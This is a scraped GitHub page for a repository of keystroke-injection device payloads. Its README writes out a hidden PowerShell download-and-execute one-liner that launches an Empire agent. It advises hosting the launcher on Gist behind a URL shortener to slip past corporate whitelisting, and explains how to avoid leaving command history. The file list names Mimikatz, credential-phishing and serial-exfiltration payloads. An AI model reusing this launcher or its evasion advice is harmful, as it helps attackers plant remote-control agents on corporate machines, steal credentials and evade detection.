PAYLOADS

[win]_empire-PS.txt

This Payload will execute an Empire Powershell launcher, which usually I host on Gist and then use google shortener to shorten the URL. Most corporate environments are whitelisting both gist.github.com and google, so it is easy to deploy an agent in this way. (of course this payload will leave the command powershell -W Hidden -nop -noni -c "IEX (New-Object Net.Webclient).downloadstring('https://goo.gl/XXXXX')" into the cmd history. But you just need to execute it in a cmd to avoid it (no history, but takes more time to type).

[win]_pop-calc.txt

Will pop-up the classic calculator

More to come...

Name		Name	Last commit message	Last commit date
Latest commit History 1 Commit
EmpireAgent.txt		EmpireAgent.txt
LinuxIfconfig.txt		LinuxIfconfig.txt
LinuxSerialExfil.txt		LinuxSerialExfil.txt
Mimikatz.txt		Mimikatz.txt
MimikatzScr.txt		MimikatzScr.txt
PhishCreds.ps1		PhishCreds.ps1
Readme.md		Readme.md
WHID_MimiKatz.txt		WHID_MimiKatz.txt
WinCalc.txt		WinCalc.txt
WinSerialExfil.txt		WinSerialExfil.txt

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

PAYLOADS

About

Releases

Packages

Languages

hacker213/WHID_Cactus_Payloads

Folders and files

Latest commit

History

Repository files navigation

PAYLOADS

About

Resources

Stars

Watchers

Forks

Releases

Packages 0

Languages

Packages